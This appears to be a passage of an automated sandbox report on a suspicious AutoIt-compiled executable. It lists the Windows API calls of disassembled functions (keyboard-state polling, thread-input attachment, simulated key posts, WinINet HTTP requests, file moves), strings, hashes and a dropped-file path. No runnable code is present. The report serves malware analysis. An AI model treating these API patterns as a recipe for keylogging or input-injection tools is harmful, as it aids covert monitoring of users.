                APIs
                • SendMessageW.USER32(?,?,000000FF,?), ref: 004391FD
                • SendMessageW.USER32(?,?,00000000,00000000), ref: 00439210
                • CharNextW.USER32(?,?,?,000000FF,?), ref: 00439242
                • SendMessageW.USER32(?,?,00000000,00000000), ref: 0043925A
                • SendMessageW.USER32(?,?,00000000,?), ref: 0043928B
                • SendMessageW.USER32(?,?,000000FF,?), ref: 004392A2
                • SendMessageW.USER32(?,?,00000000,00000000), ref: 004392B5
                • SendMessageW.USER32(?,00000402,?), ref: 004392F2
                • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00439366
                • SendMessageW.USER32(?,00001002,00000000,?), ref: 004393D0
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                Similarity
                • API ID: MessageSend$CharNext
                • String ID:
                • API String ID: 1350042424-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0044E76C
                  • Part of subcall function 003F1D10: _wcslen.LIBCMT ref: 003F1D11
                  • Part of subcall function 003F1D10: _memmove.LIBCMT ref: 003F1D57
                • LoadStringW.USER32(?,?,?,00000FFF), ref: 0044E78D
                • __swprintf.LIBCMT ref: 0044E7E4
                • _wprintf.LIBCMT ref: 0044E8A0
                • _wprintf.LIBCMT ref: 0044E8C4
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                Similarity
                • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                • API String ID: 2295938435-2354261254
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                Similarity
                • API ID: __swprintf_wcscpy$__i64tow__itow
                • String ID: %.15g$0x%p$False$True
                • API String ID: 3038501623-2263619337
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0044E56D
                  • Part of subcall function 003F1D10: _wcslen.LIBCMT ref: 003F1D11
                  • Part of subcall function 003F1D10: _memmove.LIBCMT ref: 003F1D57
                • LoadStringW.USER32(?,00000072,?,00000FFF), ref: 0044E58C
                • __swprintf.LIBCMT ref: 0044E5E3
                • _wprintf.LIBCMT ref: 0044E690
                • _wprintf.LIBCMT ref: 0044E6B4
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                Similarity
                • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                • API String ID: 2295938435-8599901
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                Similarity
                • API ID: __fread_nolock$_fseek_wcscpy
                • String ID: FILE
                • API String ID: 3888824918-3121273764
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • timeGetTime.WINMM ref: 00433A6B
                  • Part of subcall function 003FC870: timeGetTime.WINMM(0041DCE3), ref: 003FC870
                • Sleep.KERNEL32(0000000A), ref: 00433AA3
                • FindWindowExW.USER32 ref: 00433ACC
                • SetActiveWindow.USER32(00000000), ref: 00433AF0
                • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00433B00
                • SendMessageW.USER32(00000000,00000010,00000000,00000000), ref: 00433B26
                • Sleep.KERNEL32(000000FA), ref: 00433B31
                • IsWindow.USER32(00000000), ref: 00433B3E
                • EndDialog.USER32(00000000,00000000), ref: 00433B50
                  • Part of subcall function 004338C5: GetWindowThreadProcessId.USER32(?,00000000), ref: 004338E8
                  • Part of subcall function 004338C5: GetCurrentThreadId.KERNEL32 ref: 004338EF
                  • Part of subcall function 004338C5: AttachThreadInput.USER32(00000000), ref: 004338F6
                • EnumThreadWindows.USER32(00000000,Function_00033CEE,00000000), ref: 00433B6F
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                Similarity
                • API ID: ThreadWindow$MessageSendSleepTimetime$ActiveAttachCurrentDialogEnumFindInputProcessWindows
                • String ID: BUTTON
                • API String ID: 1834419854-3405671355
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                Similarity
                • API ID: _wcscpy$Cleanup$Startup_memmovegethostbynamegethostnameinet_ntoa
                • String ID: 0.0.0.0
                • API String ID: 3306283345-3771769585
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetKeyboardState.USER32(?), ref: 00443C55
                • SetKeyboardState.USER32(?), ref: 00443CB0
                • GetAsyncKeyState.USER32(000000A0), ref: 00443CD3
                • GetKeyState.USER32(000000A0), ref: 00443CEA
                • GetAsyncKeyState.USER32(000000A1), ref: 00443D19
                • GetKeyState.USER32(000000A1), ref: 00443D2A
                • GetAsyncKeyState.USER32(00000011), ref: 00443D56
                • GetKeyState.USER32(00000011), ref: 00443D64
                • GetAsyncKeyState.USER32(00000012), ref: 00443D8D
                • GetKeyState.USER32(00000012), ref: 00443D9B
                • GetAsyncKeyState.USER32(0000005B), ref: 00443DC4
                • GetKeyState.USER32(0000005B), ref: 00443DD2
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                Similarity
                • API ID: State$Async$Keyboard
                • String ID:
                • API String ID: 541375521-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetDlgItem.USER32 ref: 004257E9
                • GetWindowRect.USER32 ref: 004257FB
                • MoveWindow.USER32(?,0000000A,?,?,?,00000000), ref: 00425865
                • GetDlgItem.USER32 ref: 00425878
                • GetWindowRect.USER32 ref: 0042588A
                • MoveWindow.USER32(?,?,00000000,?,00000001,00000000), ref: 004258DC
                • GetDlgItem.USER32 ref: 004258EA
                • GetWindowRect.USER32 ref: 004258FC
                • MoveWindow.USER32(?,0000000A,00000000,?,?,00000000), ref: 00425941
                • GetDlgItem.USER32 ref: 0042594F
                • MoveWindow.USER32(00000000,0000000A,0000000A,?,-000000FB,00000000), ref: 00425968
                • InvalidateRect.USER32(?,00000000,00000001), ref: 00425975
                Similarity
                • API ID: Window$ItemMoveRect$Invalidate
                • String ID:
                • API String ID: 3096461208-0
                • Opcode ID: 1a156b492134016be48ce1e841245e22fb72a6b65cdec7b5249dec508c8cb1b8
                • Instruction ID: 3f995e88ba6991ae784cd92df6dfd51c04ff64140bbb2b55f0f104586c487c70
                • Opcode Fuzzy Hash: 1a156b492134016be48ce1e841245e22fb72a6b65cdec7b5249dec508c8cb1b8
                • Instruction Fuzzy Hash: 8E515171B00619ABCB18DF68DD95AAEB7B6FB88310F14812AF905E7390D774ED408B54
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Similarity
                • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                • String ID:
                • API String ID: 136442275-0
                • Opcode ID: f44b64b18f6ea7c983eec9a8234630f8d9fd218802d3b96fa03112008226ce0d
                • Instruction ID: e09d71bffdd76d7f25ef183c66ced68e275b485ed7a432a3731220a6f1bc0bc5
                • Opcode Fuzzy Hash: f44b64b18f6ea7c983eec9a8234630f8d9fd218802d3b96fa03112008226ce0d
                • Instruction Fuzzy Hash: A04194B390022C6ACB25EB51CC41DEE737CAF88305F4086DEF50966141EA796BC88FA5
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Strings
                Similarity
                • API ID: DestroyWindow
                • String ID: static
                • API String ID: 3375834691-2160076837
                • Opcode ID: 367e45a23e01da11acf6408796a860ff4470f9fdf76e3b2d2a198bee4c0c62da
                • Instruction ID: fe836fd85a507e37e848a599f0887400fdb723dd3b87ecf4fc1ecfda0f929e96
                • Opcode Fuzzy Hash: 367e45a23e01da11acf6408796a860ff4470f9fdf76e3b2d2a198bee4c0c62da
                • Instruction Fuzzy Hash: 16416071210215ABEB149F64DC85FEB33A9EB99724F20432AFA14D72C0D7B4EC51CB68
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00438101
                • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00438104
                • GetWindowLongW.USER32(?,000000F0), ref: 00438128
                • _memset.LIBCMT ref: 00438139
                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0043814B
                • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 004381BF
                • SendMessageW.USER32(?,00001074,?,00000007), ref: 0043820D
                • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00438228
                • SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 0043824A
                • SendMessageW.USER32(?,0000101E,00000001,?), ref: 00438261
                • SendMessageW.USER32(?,00001008,?,00000007), ref: 00438279
                Similarity
                • API ID: MessageSend$LongWindow_memset
                • String ID:
                • API String ID: 830647256-0
                • Opcode ID: cae8bf7d5067cf787fbc8b2641cd5665346cc35fb08136c3c441a9748bdc0465
                • Instruction ID: 9c602aaad70e63dd7addc4b49f49efdb7b1edaa7fde9ff14218c9ff70419c54a
                • Opcode Fuzzy Hash: cae8bf7d5067cf787fbc8b2641cd5665346cc35fb08136c3c441a9748bdc0465
                • Instruction Fuzzy Hash: D0616D75A00208AFDB10DF98DC85FEE77B8BF49314F10419AF914AB391DBB4AA45CB94
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,004695B7), ref: 0046933A
                • SafeArrayAllocData.OLEAUT32(004695B7), ref: 00469389
                • VariantInit.OLEAUT32(?), ref: 0046939B
                • SafeArrayAccessData.OLEAUT32(004695B7,?), ref: 004693BC
                • VariantCopy.OLEAUT32(?,?), ref: 0046941B
                • SafeArrayUnaccessData.OLEAUT32(004695B7), ref: 0046942E
                • VariantClear.OLEAUT32(?), ref: 00469443
                • SafeArrayDestroyData.OLEAUT32(004695B7), ref: 00469468
                • SafeArrayDestroyDescriptor.OLEAUT32(004695B7), ref: 00469472
                • VariantClear.OLEAUT32(?), ref: 00469484
                • SafeArrayDestroyDescriptor.OLEAUT32(004695B7), ref: 004694A1
                Similarity
                • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                • String ID:
                • API String ID: 2706829360-0
                • Opcode ID: abd10900d825b18f5accc6c1e6e8991776e8cc8ba1cf1bc94a6ffc1f93b25f13
                • Instruction ID: 27d91888a2664f50aee10a74df4e9fb1592295043d6ee1971b424155b0a676b6
                • Opcode Fuzzy Hash: abd10900d825b18f5accc6c1e6e8991776e8cc8ba1cf1bc94a6ffc1f93b25f13
                • Instruction Fuzzy Hash: AC514076A0021DABCB00DFE4DD849EEB7B9FF48304F10456AE905A7201DB75DE46CBA5
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetKeyboardState.USER32(?), ref: 004346F3
                • GetAsyncKeyState.USER32(000000A0), ref: 0043477E
                • GetKeyState.USER32(000000A0), ref: 0043478F
                • GetAsyncKeyState.USER32(000000A1), ref: 004347AD
                • GetKeyState.USER32(000000A1), ref: 004347BE
                • GetAsyncKeyState.USER32(00000011), ref: 004347DA
                • GetKeyState.USER32(00000011), ref: 004347E8
                • GetAsyncKeyState.USER32(00000012), ref: 00434804
                • GetKeyState.USER32(00000012), ref: 00434812
                • GetAsyncKeyState.USER32(0000005B), ref: 0043482E
                • GetKeyState.USER32(0000005B), ref: 0043483D
                Similarity
                • API ID: State$Async$Keyboard
                • String ID:
                • API String ID: 541375521-0
                • Opcode ID: 587226cd530c537e3bf8a3c5e801d9c05b66781305e7bf1b92926d92b478a5b2
                • Instruction ID: 0707c2e9391334560a2dfc1bbf6522f56aea6f47f04c74b493afcf129188439c
                • Opcode Fuzzy Hash: 587226cd530c537e3bf8a3c5e801d9c05b66781305e7bf1b92926d92b478a5b2
                • Instruction Fuzzy Hash: C54106346047CA29FF35966488043E7BAE16BAB310F04909BD5C5077C1D7EDB9C8C7AA
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • __swprintf.LIBCMT ref: 00423058
                • __swprintf.LIBCMT ref: 0042306A
                • __wcsicoll.LIBCMT ref: 00423077
                • FindResourceW.KERNEL32(?,?,0000000E), ref: 0042308A
                • LoadResource.KERNEL32(?,00000000), ref: 004230A2
                • LockResource.KERNEL32(00000000), ref: 004230AF
                • FindResourceW.KERNEL32(?,?,00000003), ref: 004230DC
                • LoadResource.KERNEL32(?,00000000), ref: 004230EA
                • SizeofResource.KERNEL32(?,00000000), ref: 004230F9
                • LockResource.KERNEL32(?), ref: 00423105
                Similarity
                • API ID: Resource$FindLoadLock__swprintf$Sizeof__wcsicoll
                • String ID:
                • API String ID: 1158019794-0
                • Opcode ID: a89369ce411b1882b04e1ffb186a1630d3f51cae4a291a29fae113f1658becc5
                • Instruction ID: 4d2f44a84d96f59ca1a38ec429739f0f5ab470209ebebff79e2eeb53e661ebfb
                • Opcode Fuzzy Hash: a89369ce411b1882b04e1ffb186a1630d3f51cae4a291a29fae113f1658becc5
                • Instruction Fuzzy Hash: 0841F3326042286BC720DF64EC84FAB77BDEB89301F40846AF905D6245EB79DA51C7B8
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00440616
                • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 0044062A
                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 0044064B
                • _wcslen.LIBCMT ref: 00440696
                • _wcscat.LIBCMT ref: 004406A9
                • SendMessageW.USER32(?,00001057,00000000,?), ref: 004406C2
                • SendMessageW.USER32(?,00001061,?,?), ref: 004406F4
                Strings
                Similarity
                • API ID: MessageSend$Window_wcscat_wcslen
                • String ID: -----$SysListView32
                • API String ID: 4008455318-3975388722
                • Opcode ID: 5067eef2fb1db3bd9c566ee10f56890b12aa1800011e53f636904f23535ce9e6
                • Instruction ID: ad6b7ad60e6b5491ea889048fe5483f0ccb586868e97feb3a549f88ca9a2d821
                • Opcode Fuzzy Hash: 5067eef2fb1db3bd9c566ee10f56890b12aa1800011e53f636904f23535ce9e6
                • Instruction Fuzzy Hash: 0B51A470600308ABEB24CF65DC89FEB77A5EF98304F10451EF649A72C1D7B99994CB58
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Strings
                Similarity
                • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                • String ID: 0
                • API String ID: 176399719-4108050209
                • Opcode ID: 4bf97de4df8a4edc629308afba843b35ff7e0f10493062c026a9954e731c7471
                • Instruction ID: f747358ac4455cfe1be4ca3fc91d7c88c3018ed20b3ccad4fda5457f03a41bf9
                • Opcode Fuzzy Hash: 4bf97de4df8a4edc629308afba843b35ff7e0f10493062c026a9954e731c7471
                • Instruction Fuzzy Hash: AD418C75A00209AFCB00CFA8D884A9AB7B4FF4D310F14816AFD189B341DB74A851CFA4
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 00431331: DeleteObject.GDI32(?), ref: 00431392
                • SendMessageW.USER32(7692D360,00001001,00000000,?), ref: 00438D6F
                • SendMessageW.USER32(7692D360,00001026,00000000,?), ref: 00438D7E
                  • Part of subcall function 004313B9: CreateSolidBrush.GDI32(?), ref: 00431405
                Similarity
                • API ID: MessageSend$BrushCreateDeleteObjectSolid
                • String ID:
                • API String ID: 3771399671-0
                • Opcode ID: 25a728011c00f04097b8e2539e23f9955433389e4ef5399df42d9a4a499863bb
                • Instruction ID: 2e0a572e4529821e749c28a0f41037d60d8cbdecac9953aa9ba82f262fab4aae
                • Opcode Fuzzy Hash: 25a728011c00f04097b8e2539e23f9955433389e4ef5399df42d9a4a499863bb
                • Instruction Fuzzy Hash: 9351F371300304ABDB20DF65DD86F6AB7A8AB08B24F10551FFA54DB290CBB9E941CB58
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetCurrentThreadId.KERNEL32 ref: 0042462A
                • GetForegroundWindow.USER32(00000000), ref: 0042463C
                • GetWindowThreadProcessId.USER32(00000000), ref: 00424643
                • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00424658
                • GetWindowThreadProcessId.USER32(?,?), ref: 00424666
                • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 0042467F
                • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 0042468D
                • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004246DA
                • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004246EE
                • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004246F9
                Similarity
                • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                • String ID:
                • API String ID: 2156557900-0
                • Opcode ID: 922ba51a581951b6c5adfa05936ef5802d8055027087fddc20a0753af83a1c18
                • Instruction ID: 2d5c4b728e4abd82899cadbdfb8a65b12484fc84214180d126d2ada29ed039ea
                • Opcode Fuzzy Hash: 922ba51a581951b6c5adfa05936ef5802d8055027087fddc20a0753af83a1c18
                • Instruction Fuzzy Hash: 03316CB2600215BFDB11DF68ED84A6BB7A9FB95320F42412FF80587210E7B99D408B6C
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • InterlockedIncrement.KERNEL32(00497F04), ref: 0041C5DF
                • InterlockedDecrement.KERNEL32(00497F04), ref: 0041C5FD
                • Sleep.KERNEL32(0000000A), ref: 0041C605
                • InterlockedIncrement.KERNEL32(00497F04), ref: 0041C610
                • InterlockedDecrement.KERNEL32(00497F04), ref: 0041C6C2
                Strings
                Similarity
                • API ID: Interlocked$DecrementIncrement$Sleep
                • String ID: @COM_EVENTOBJ$DZG
                • API String ID: 327565842-1074702082
                • Opcode ID: e1b7fe0f842e8ad0d82bc11326fca26374d55203a49dba555b769570494085fa
                • Instruction ID: 2f919a56f3f3ed618c35a87ab0f12ff24f8a1a7376fc6651cf3ceedbbfaa8369
                • Opcode Fuzzy Hash: e1b7fe0f842e8ad0d82bc11326fca26374d55203a49dba555b769570494085fa
                • Instruction Fuzzy Hash: 2DD1B071A00209DBDB11EF94C9C5BEEB7B4FF44304F20816AE5156B392D778AD86CB98
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Strings
                Similarity
                • API ID: AddressProc_free_malloc$_strlen
                • String ID: AU3_FreeVar
                • API String ID: 3358881862-771828931
                • Opcode ID: 28f2280e12e18da6ff0bcfc2b74f26fe9d544a05a6ae3dd197d34f202110145f
                • Instruction ID: 2308f961f62e884b609e3206f1a8f20425cf13c7c1e877a9a11b2eeccd234717
                • Opcode Fuzzy Hash: 28f2280e12e18da6ff0bcfc2b74f26fe9d544a05a6ae3dd197d34f202110145f
                • Instruction Fuzzy Hash: A8B1AFB4A00206DFDB00DF64C885A6AB7B5FF88314F2485AEE9158F362D739ED51CB94
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • _memset.LIBCMT ref: 0044FB72
                • GetMenuItemInfoW.USER32 ref: 0044FBBF
                • IsMenu.USER32 ref: 0044FBD6
                • CreatePopupMenu.USER32(00000000,?,769133D0), ref: 0044FC0E
                • GetMenuItemCount.USER32 ref: 0044FC74
                • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0044FC9D
                Strings
                Similarity
                • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                • String ID: 0$2
                • API String ID: 3311875123-3793063076
                • Opcode ID: 20dab057f09a79228e43ad13d7f574ec0b7acee33be8fe90f5e0bef56a9a67a8
                • Instruction ID: f055716a5e8b495d54557d9d6669e67bf99c130155b06911fe73846a66ef716f
                • Opcode Fuzzy Hash: 20dab057f09a79228e43ad13d7f574ec0b7acee33be8fe90f5e0bef56a9a67a8
                • Instruction Fuzzy Hash: D551A5719002099BEB20CF69D9C8BAFB7E4FF45314F14852EE825D7381D3789849CBA9
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Strings
                Similarity
                • API ID: __wcsnicmp
                • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin$DZG
                • API String ID: 1038674560-2411836789
                • Opcode ID: 387e1ed653f7cae8f8957bfbf67991552ef77c450f06cacfce457aeb5f98ce27
                • Instruction ID: bff3eb5a5cc57bc735758c777d44ee8112a4ef71d3f635cdb7e1a166324e142a
                • Opcode Fuzzy Hash: 387e1ed653f7cae8f8957bfbf67991552ef77c450f06cacfce457aeb5f98ce27
                • Instruction Fuzzy Hash: AC21FB3765061066E321B619AC82FDB739C9F69314F04803BFD05AF342D6BAB95583EA
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetModuleHandleW.KERNEL32(00000000,004990E8,?,00000100,?,C:\Users\user\31956653\thjfdg.xcp), ref: 0042403E
                • LoadStringW.USER32(00000000), ref: 00424047
                • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0042405C
                • LoadStringW.USER32(00000000), ref: 0042405F
                • _wprintf.LIBCMT ref: 00424088
                • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004240A0
                Strings
                • C:\Users\user\31956653\thjfdg.xcp, xrefs: 00424027
                • %s (%d) : ==> %s: %s %s, xrefs: 00424083
                Similarity
                • API ID: HandleLoadModuleString$Message_wprintf
                • String ID: %s (%d) : ==> %s: %s %s$C:\Users\user\31956653\thjfdg.xcp
                • API String ID: 3648134473-926813165
                Uniqueness

                Uniqueness Score: -1.00%

                Similarity
                • API ID:
                • String ID:
                • API String ID:
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 003FF220: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\31956653\thjfdg.xcp,003FF1F5,C:\Users\user\31956653\thjfdg.xcp,004990E8,C:\Users\user\31956653\thjfdg.xcp,?,003FF1F5,?,?,00000001), ref: 003FF23C
                  • Part of subcall function 0042397D: GetFileAttributesW.KERNELBASE(?), ref: 00423984
                • lstrcmpiW.KERNEL32(?,?), ref: 00443875
                • MoveFileW.KERNEL32(?,?), ref: 004438A7
                Similarity
                • API ID: File$AttributesFullMoveNamePathlstrcmpi
                • String ID:
                • API String ID: 978794511-0
                Uniqueness

                Uniqueness Score: -1.00%

                Similarity
                • API ID:
                • String ID:
                • API String ID:
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 004359AD: GetWindowThreadProcessId.USER32(?,00000000), ref: 004359CD
                  • Part of subcall function 004359AD: GetCurrentThreadId.KERNEL32 ref: 004359D4
                  • Part of subcall function 004359AD: AttachThreadInput.USER32(00000000), ref: 004359DB
                • MapVirtualKeyW.USER32(00000025,00000000), ref: 00435D75
                • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00435D8E
                • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00435D9C
                • MapVirtualKeyW.USER32(00000025,00000000), ref: 00435DA2
                • PostMessageW.USER32(00000000,00000100,00000027,00000000), ref: 00435DC3
                • Sleep.KERNEL32(00000000), ref: 00435DD1
                • MapVirtualKeyW.USER32(00000025,00000000), ref: 00435DD7
                • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00435DEC
                • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000), ref: 00435DF4
                Similarity
                • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                • String ID:
                • API String ID: 2014098862-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Similarity
                • API ID: ClearVariant
                • String ID:
                • API String ID: 1473721057-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • VariantInit.OLEAUT32(00000000), ref: 0044EA43
                • VariantCopy.OLEAUT32(00000000), ref: 0044EA4D
                • VariantClear.OLEAUT32 ref: 0044EA5A
                • VariantTimeToSystemTime.OLEAUT32 ref: 0044EBF3
                • __swprintf.LIBCMT ref: 0044EC20
                • VariantInit.OLEAUT32(00000000), ref: 0044ECDB
                Strings
                • %4d%02d%02d%02d%02d%02d, xrefs: 0044EC1A
                Similarity
                • API ID: Variant$InitTime$ClearCopySystem__swprintf
                • String ID: %4d%02d%02d%02d%02d%02d
                • API String ID: 2441338619-1568723262
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • _memset.LIBCMT ref: 0045BA14
                • VariantInit.OLEAUT32(?), ref: 0045BAE4
                  • Part of subcall function 00441AB8: GetLastError.KERNEL32(?,?,00000000), ref: 00441B16
                  • Part of subcall function 00441AB8: VariantCopy.OLEAUT32(?,?), ref: 00441B6E
                  • Part of subcall function 00441AB8: VariantCopy.OLEAUT32(-00000068,?), ref: 00441B84
                  • Part of subcall function 00441AB8: VariantCopy.OLEAUT32(-00000088,?), ref: 00441B9D
                  • Part of subcall function 00441AB8: VariantClear.OLEAUT32(-00000058), ref: 00441C17
                Strings
                Similarity
                • API ID: Variant$Copy$ClearErrorInitLast_memset
                • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                • API String ID: 530611519-625585964
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0043AA09
                • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0043AA3E
                • InternetQueryOptionW.WININET(00000000,0000001F,00000000,00001000), ref: 0043AAA2
                • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0043AAB8
                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0043AAC7
                • HttpQueryInfoW.WININET(00000000,00000005,?,00001000,00000000), ref: 0043AAFF
                  • Part of subcall function 00432252: GetLastError.KERNEL32 ref: 00432268
                Strings
                Similarity
                • API ID: HttpInternet$OptionQueryRequest$ConnectErrorInfoLastOpenSend
                • String ID:
                • API String ID: 1291720006-3916222277
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • SafeArrayAccessData.OLEAUT32(?,?), ref: 004252F4
                • VariantClear.OLEAUT32(?), ref: 0042532E
                • SafeArrayUnaccessData.OLEAUT32(?), ref: 0042534E
                • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00425381
                • VariantClear.OLEAUT32(?), ref: 004253C1
                • SafeArrayUnaccessData.OLEAUT32(?), ref: 00425404
                Strings
                Similarity
                • API ID: ArrayDataSafeVariant$ClearUnaccess$AccessChangeType
                • String ID: crts
                • API String ID: 586820018-3724388283
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 003FF220: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\31956653\thjfdg.xcp,003FF1F5,C:\Users\user\31956653\thjfdg.xcp,004990E8,C:\Users\user\31956653\thjfdg.xcp,?,003FF1F5,?,?,00000001), ref: 003FF23C
                • lstrcmpiW.KERNEL32(?,?), ref: 0043BB95
                • MoveFileW.KERNEL32(?,?), ref: 0043BBCB
                • _wcscat.LIBCMT ref: 0043BC3B
                • _wcslen.LIBCMT ref: 0043BC47
                • _wcslen.LIBCMT ref: 0043BC5D
                • SHFileOperationW.SHELL32(?), ref: 0043BCA3
                Strings
                Similarity
                • API ID: File_wcslen$FullMoveNameOperationPath_wcscatlstrcmpi
                • String ID: \*.*
                • API String ID: 2326526234-1173974218
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • InterlockedExchange.KERNEL32(?,000001F5), ref: 0043B433
                  • Part of subcall function 004014F7: _malloc.LIBCMT ref: 00401511
                • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0043B466
                • EnterCriticalSection.KERNEL32(?), ref: 0043B483
                • _memmove.LIBCMT ref: 0043B4E1
                • _memmove.LIBCMT ref: 0043B504
                • LeaveCriticalSection.KERNEL32(?), ref: 0043B513
                • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 0043B52F
                • InterlockedExchange.KERNEL32(?,000001F6), ref: 0043B544
                Similarity
                • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterLeave_malloc
                • String ID:
                • API String ID: 2737351978-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Similarity
                • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit__initptd_free
                • String ID:
                • API String ID: 73303432-0
                Uniqueness

                Uniqueness Score: -1.00%

                Strings
                Similarity
                • API ID: Variant$Copy$ClearErrorLast
                • String ID: NULL Pointer assignment$Not an Object type
                • API String ID: 2487901850-572801152
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetSystemMetrics.USER32 ref: 0043049C
                • MoveWindow.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004306D8
                • SendMessageW.USER32(?,00000142,00000000,0000FFFF), ref: 004306F7
                • InvalidateRect.USER32(?,00000000,00000001), ref: 0043071A
                • SendMessageW.USER32(?,00000469,?,00000000), ref: 0043074F
                • ShowWindow.USER32(?,00000000,?,00000469,?,00000000), ref: 00430772
                • DefDlgProcW.USER32(?,00000005,?,?), ref: 0043078C
                Similarity
                • API ID: MessageSendWindow$InvalidateMetricsMoveProcRectShowSystem
                • String ID:
                • API String ID: 1457242333-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 004370BF: DeleteObject.GDI32(00000000), ref: 004370FC
